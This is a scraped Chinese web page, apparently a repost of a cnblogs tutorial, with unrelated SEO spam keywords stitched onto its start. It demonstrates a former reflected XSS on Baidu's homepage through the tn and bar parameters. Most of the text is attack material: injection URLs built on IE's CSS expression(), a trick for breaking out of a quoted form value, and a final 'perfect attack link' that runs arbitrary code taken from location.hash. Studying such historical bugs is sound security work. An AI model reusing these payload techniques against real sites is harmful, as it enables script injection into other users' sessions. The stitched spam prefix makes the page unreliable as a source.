广西建设厅官方网站电话,网络推广公司优化客,数据库网站,做网站页面拿百度主页曾经的一个XSS做个演示#xff0c;这个漏洞是由于百度主页tn和bar参数过滤不严导致的参数型XSS#xff1a;http://www.baidu.com/index.php?tn/**/stylexss:expression(alert(‘xss‘)); http://www.baidu.com/index.php?bar/**/stylexss:expressio…拿百度主页曾经的一个XSS做个演示这个漏洞是由于百度主页tn和bar参数过滤不严导致的参数型XSShttp://www.baidu.com/index.php?tn/**/stylexss:expression(alert(‘xss‘)); http://www.baidu.com/index.php?bar/**/stylexss:expression(alert(‘xss‘)); tn和bar两个参数对应在页面的输出是两个input表单值可以使用”(双引号)闭合表单值加入CSS属性跨站页面具体输出如下input typehidden nametn value/**/stylexss:expression(alert(‘xss‘)); 这个漏洞只能在IE下使用FIREFOX会把URL链接参数中的”(双引号)转成编码%22,页面参数的输出也会变成%22,就不能闭合”(双引号)跨站。expression()是个不听话的角色这里可以用一个小技巧来去掉expression烦人的死循环。运行当前URL的#注释符后的代码 eval(unescape(location.hash.substr(1))) 给window对象的方法定义一个值判断这个值运行一次代码 (window.r!1)?eval(‘window.r1;eval(unescape(location.hash.substr(1)))‘):1 最后得到完美的攻击链接 http://www.baidu.com/index.php?bar/**/stylexss:expression((window.r!1)?eval(‘window.r1;eval(unescape(location.hash.substr(1)))‘):1);#alert%28%29 转载于:https://www.cnblogs.com/itchong/p/abcd9.html
